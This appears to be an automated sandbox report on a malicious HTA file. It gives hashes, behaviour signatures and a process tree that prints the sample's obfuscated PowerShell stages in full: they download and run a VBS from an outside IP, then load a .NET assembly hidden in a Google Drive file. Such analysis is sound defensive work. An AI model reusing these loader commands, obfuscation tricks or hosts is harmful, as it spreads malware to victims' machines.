Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31-10-2024 20:41
Static task
static1
Behavioral task
behavioral1
Sample
seethebestthingswithgreatthingshrewithme.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seethebestthingswithgreatthingshrewithme.hta
Resource
win10v2004-20241007-en
General
-
Target
seethebestthingswithgreatthingshrewithme.hta
-
Size
205KB
-
MD5
d50fd6f65b574b2c9ca393cbd44ecf11
-
SHA1
1f2126c711c25c4104cf34d42316db0cf8b50d89
-
SHA256
d4ceed54c4c40a1ab8e3dc310e96ad94aa5bb7e65269cac051d974257fb44e90
-
SHA512
c91cf64044091d7bef8c05e19e28b0c1403960d0944d96e4f68da241b36bfac1689aae6d07356721853a732ee919abe5d1686baf6625f58d5802110e390b20d8
-
SSDEEP
96:43F97tMfPVMXbfrrFAQGFYIO7QpOMPMKtbMxQ:43F1tiV2VAQTt8NNcQ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2536 PowErSHell.Exe 6 1980 powershell.exe 8 1980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2976 powershell.exe 1980 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2536 PowErSHell.Exe 2776 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowErSHell.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2536 PowErSHell.Exe 2776 powershell.exe 2536 PowErSHell.Exe 2536 PowErSHell.Exe 2976 powershell.exe 1980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2536 PowErSHell.Exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1960 wrote to memory of 2536 1960 mshta.exe 31 PID 1960 wrote to memory of 2536 1960 mshta.exe 31 PID 1960 wrote to memory of 2536 1960 mshta.exe 31 PID 1960 wrote to memory of 2536 1960 mshta.exe 31 PID 2536 wrote to memory of 2776 2536 PowErSHell.Exe 33 PID 2536 wrote to memory of 2776 2536 PowErSHell.Exe 33 PID 2536 wrote to memory of 2776 2536 PowErSHell.Exe 33 PID 2536 wrote to memory of 2776 2536 PowErSHell.Exe 33 PID 2536 wrote to memory of 2996 2536 PowErSHell.Exe 34 PID 2536 wrote to memory of 2996 2536 PowErSHell.Exe 34 PID 2536 wrote to memory of 2996 2536 PowErSHell.Exe 34 PID 2536 wrote to memory of 2996 2536 PowErSHell.Exe 34 PID 2996 wrote to memory of 2920 2996 csc.exe 35 PID 2996 wrote to memory of 2920 2996 csc.exe 35 PID 2996 wrote to memory of 2920 2996 csc.exe 35 PID 2996 wrote to memory of 2920 2996 csc.exe 35 PID 2536 wrote to memory of 1692 2536 PowErSHell.Exe 37 PID 2536 wrote to memory of 1692 2536 PowErSHell.Exe 37 PID 2536 wrote to memory of 1692 2536 PowErSHell.Exe 37 PID 2536 wrote to memory of 1692 2536 PowErSHell.Exe 37 PID 1692 wrote to memory of 2976 1692 WScript.exe 38 PID 1692 wrote to memory of 2976 1692 WScript.exe 38 PID 1692 wrote to memory of 2976 1692 WScript.exe 38 PID 1692 wrote to memory of 2976 1692 WScript.exe 38 PID 2976 wrote to memory of 1980 2976 powershell.exe 40 PID 2976 wrote to memory of 1980 2976 powershell.exe 40 PID 2976 wrote to memory of 1980 2976 powershell.exe 40 PID 2976 wrote to memory of 1980 2976 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgreatthingshrewithme.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe"C:\Windows\sysTem32\wiNDowsPowERsHEll\V1.0\PowErSHell.Exe" "POWErSheLl.exe -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE ; IEx($(IeX('[sYstEM.TEXT.ENCoDInG]'+[chAr]0x3A+[CHar]0x3a+'Utf8.gETSTriNG([SystEM.ConvERT]'+[chAr]58+[ChaR]58+'fROmBAsE64sTRiNg('+[CHar]34+'JHpiejRLVXlZczhPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFZmlOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGdnUFl2VVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERSVixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPUEMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6enFhc29aYnUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1PdEZ0dW1mTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkemJ6NEtVeVlzOE86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc1LjEzMC4zNi8xMjAvcGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmdmb3IudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nnb29kaWRlYXBsYW5uaW5nLnZicyIsMCwwKTtTVGFSVC1zTEVFcCgzKTtTVEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdHRoaW5nc2dvb2RpZGVhcGxhbm5pbmcudmJzIg=='+[ChAr]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPAsS -nOp -w 1 -C deVIcECREdEnTiaLDeplOyMENt.exE3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\otqfwxcj.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF059.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF058.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2920
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithgreatthingsgoodideaplanning.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdFdC1WQVJJYUJsRSAnKk1EUionKS5uQW1FWzMsMTEsMl0tam9pTicnKSgoKCdZaHhpbWFnZVVybCA9IHNpRWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcicrJ3Q9ZG93bmxvJysnYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHNpRTtZaHh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1loeGltYWdlQnl0ZXMgPSBZaHh3ZWJDbGllbnQuRG93bmxvYWREYXRhKFloeGltYWdlVXJsKTtZaHhpbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jb2RpJysnbicrJ2ddOjpVVEY4LkdldFN0cmluZyhZaHhpbWFnZUJ5dGVzKTtZaHhzdGFydEZsYWcgPSBzaUUnKyc8PEJBU0U2NF9TVEFSVD4+c2lFO1loeGVuZEZsYWcgPSBzaUU8PEJBU0U2NF9FTkQ+PnNpJysnRTtZaHhzdGFydEluZGV4ID0gWWh4aW1hZ2VUZXh0LkluZGV4T2YoWWh4c3RhcnRGbCcrJ2FnKTtZaHhlbmRJbmRleCcrJyA9IFloeGltYWdlVGUnKyd4dC5JbmRlJysneE9mKFloeGVuZEZsYScrJ2cpO1knKydoeHN0JysnYXJ0SW5kZXggLWdlIDAgLWFuZCBZaHhlbmRJbmRleCAtZ3QnKycgWWh4c3RhcnRJbmRleDtZaHhzdGFydEluZGV4ICs9IFloeHN0YXJ0RmxhZy5MZW5ndGg7WWh4YmFzZTY0TGVuZ3RoID0gWWgnKyd4ZW5kSW5kZXggLSBZaHhzdGFydEluZGV4JysnO1loeGJhc2U2NENvbW1hbmQgPSBZaHhpbWFnJysnZVRleHQuU3Vic3RyaW5nKFloeCcrJ3N0YXJ0SW5kZXgsIFloeGJhcycrJ2U2NExlbmd0aCk7WWh4YmEnKydzZTY0UmV2ZXJzZWQgPSAtam9pbiAoWWh4YicrJ2FzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpJysnIFFSeiBGJysnbycrJ3JFYWNoLU9iamVjdCB7IFloeF8gfSlbLTEuLi0oWWh4YmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtZaHhjb21tYW5kQnl0ZXMgPSBbJysnU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFloeGJhc2U2NFJldmVyc2VkKTtZaHhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoWWh4Y29tbWFuZEJ5dGVzKTtZaHh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2UnKyd0TWV0aG9kKHNpRVZBSXNpRSk7WWh4dmFpJysnTWV0aG9kLkludm9rZShZaHhudWxsLCBAKHMnKydpRXQnKyd4JysndC5ERk5OUkQvMDIxJysnLzYzLjAzMS41NzEuNzAxLy86cHR0aHNpRSwgc2lFJysnZGVzYXRpJysndmFkb3NpRSwgc2lFZGVzYXRpdmFkb3NpRSwgc2knKydFZGVzYXRpdmFkb3NpRSwgc2lFQ2FzUG9scycrJ2lFLCBzaUVkZXNhdGl2YWRvc2lFLCBzaUVkZXNhdGl2YWRvc2lFLHNpRWRlc2F0aXZhZG9zaUUsc2lFZGVzYXRpdmFkb3NpRSxzaUVkZXNhdGl2YWRvc2lFLHNpRWRlc2F0aXZhZG9zJysnaUUsc2lFZGVzYXRpdmFkb3NpRSxzaUUxc2lFLHNpRWRlc2F0aXZhZG9zaUUpKTsnKSAgLXJlUExhQ0UgIChbQ0hBUl0xMTUrW0NIQVJdMTA1K1tDSEFSXTY5KSxbQ0hBUl0zOSAgLWNyRXBMQWNlJ1loeCcsW0NIQVJdMzYgLWNyRXBMQWNlIChbQ0hBUl04MStbQ0hBUl04MitbQ0hBUl0xMjIpLFtDSEFSXTEyNCkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gEt-VARIaBlE '*MDR*').nAmE[3,11,2]-joiN'')((('YhximageUrl = siEhttps://drive.google.com/uc?expor'+'t=downlo'+'ad&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur siE;YhxwebClient = New-Object System.Net.WebClient;YhximageBytes = YhxwebClient.DownloadData(YhximageUrl);YhximageText = [S'+'ystem.Text.Encodi'+'n'+'g]::UTF8.GetString(YhximageBytes);YhxstartFlag = siE'+'<<BASE64_START>>siE;YhxendFlag = siE<<BASE64_END>>si'+'E;YhxstartIndex = YhximageText.IndexOf(YhxstartFl'+'ag);YhxendIndex'+' = YhximageTe'+'xt.Inde'+'xOf(YhxendFla'+'g);Y'+'hxst'+'artIndex -ge 0 -and YhxendIndex -gt'+' YhxstartIndex;YhxstartIndex += YhxstartFlag.Length;Yhxbase64Length = Yh'+'xendIndex - YhxstartIndex'+';Yhxbase64Command = Yhximag'+'eText.Substring(Yhx'+'startIndex, Yhxbas'+'e64Length);Yhxba'+'se64Reversed = -join (Yhxb'+'ase64Command.ToCharArray()'+' QRz F'+'o'+'rEach-Object { Yhx_ })[-1..-(Yhxbase64Co'+'mmand.Length)];YhxcommandBytes = ['+'System.Convert]::FromBase64String(Yhxbase64Reversed);YhxloadedAssembly = [System.Reflection.Assembly]::Load(YhxcommandBytes);YhxvaiMethod = [dnlib.IO.Home].Ge'+'tMethod(siEVAIsiE);Yhxvai'+'Method.Invoke(Yhxnull, @(s'+'iEt'+'x'+'t.DFNNRD/021'+'/63.031.571.701//:ptthsiE, siE'+'desati'+'vadosiE, siEdesativadosiE, si'+'EdesativadosiE, siECasPols'+'iE, siEdesativadosiE, siEdesativadosiE,siEdesativadosiE,siEdesativadosiE,siEdesativadosiE,siEdesativados'+'iE,siEdesativadosiE,siE1siE,siEdesativadosiE));') -rePLaCE ([CHAR]115+[CHAR]105+[CHAR]69),[CHAR]39 -crEpLAce'Yhx',[CHAR]36 -crEpLAce ([CHAR]81+[CHAR]82+[CHAR]122),[CHAR]124) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD593c081b43d3803a9682aecf64cf3fb2e
SHA1455cfdd6be9e9f0d520f43b361be563f5c3437f4
SHA256dc6807df217533eb77f3ca81a242d60b33ae025d09519691932248e8e41c62f9
SHA5126ba6fe1328f6b6e354d2beb395ce9aa33185afb8363025d50fa44fc278e85866be98ec27f46760bb9b75a5cb49aa3d776f2acbfa6de80228b02dd80eb93a20e9
-
Filesize
3KB
MD50d3e6fddbfcc03711059b83c7d4413c6
SHA109de849e165a08f88d83e094badf30cc021dc459
SHA25622b66f8a27652728e3e3c35ad16e0d852d4161c68400d5cc656731539c869194
SHA51268475eba66cb72a2661752ec37d8e706bba516b6f56cc0213a29ae9367dd7a726d00ffdf1c8f85087bdcd70b773079e09d5151103915e66c993775584e3f828f
-
Filesize
7KB
MD568cd5fe60de071091925faa2627bfe4c
SHA175c64d4e88ec4b8f51555b11693e9a92923be721
SHA256834e069ed8f33cdad6ff2239e0b5a16c102d2a811d48fdef5df9c259138fa905
SHA51249998cb1aa762688ee71247afca4feb1ab6636ecb0f0eb9d1478085f9e0a1144dd4267ca4eab486e5c44b1baa514e193f0e45ce45c44e752172410a4ced44e52
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5422f9d33876fb62672487de54166011b
SHA1a4c3b84691a183493b3eeed991af8fe7ccdf9482
SHA256178582538160598d63b9f71eef5b13cf6de5def8b403e84b7ae794a52e553622
SHA51205868d6d72580528c3bf75477b628b479eb77e59050dce514aa1557b684b44af32b6858786a6a90531ff06113e91d46475e10220f916b7909b5e8ba0cfde1af1
-
Filesize
138KB
MD59bffefbc57020a8809b3782eb2a8f14c
SHA1487d426d1e74b0ce7cf26b11c5a828d640b36f4b
SHA256bb276fb4cfa1b0f9fbd68566672cef1f670e70691c387d6fe11d8176cb009995
SHA512a93f4d082d9255b91be0d2e5449acb845a304f3b5fefc5644052e6018dd0cde4998f80932599ad7761b758870748c47b2bbe51bfa1c82c749fab01b0d118e075
-
Filesize
652B
MD53ec48e9eb4f1a15e7d39d066966ebc0e
SHA1bac3a3bf69e1dbcc072bcd271ddc618c42297784
SHA256c18501c72713d9dfbf704ea7509b42ec59bac3609646d030c7d8bc8ecf70d124
SHA512706ad35021316dc8e20f86b702320cb92c230f3a6ab0701871f7c724b0cbb36b42dc3cd64fba34d5ffe77e9f4bfa903e548bbf0e7d2f84a09be2858cab362b92
-
Filesize
469B
MD5f89c3daa6416168719346d97618dab89
SHA1291029ed13418eefcd0902435ecac1b3caeb61f2
SHA2560ae5932bfd2ff3ff3a4522cf176bc41a9062d1e981d01a73e9e8a72664423b0d
SHA5129a8ebe03128f7fbc0c5adf8d76060d7f9b1a7d4319f0cdc0af64ca80e0eba34c6c91796d1f04f044b1c1a4ec5d30a9dcf57aa662ed138f9f3f983d915216cb55
-
Filesize
309B
MD50bfdc5090a730c74eeb5b0495185c20a
SHA1a0c2e226cf94a48958fb3f8ddb5bf1da99c54554
SHA256aa0c9c9b3898745b73c50be1c0a11c9106c57f3a481af1fd142fba31ef133884
SHA51275456bd6c2fa1d664392f1787cf1f821e265a3ee22db91b12eb1990c31857d017c249a67744f744f298e316a2011d9d35441ea2f1f38b2f44f8b57b027750bc5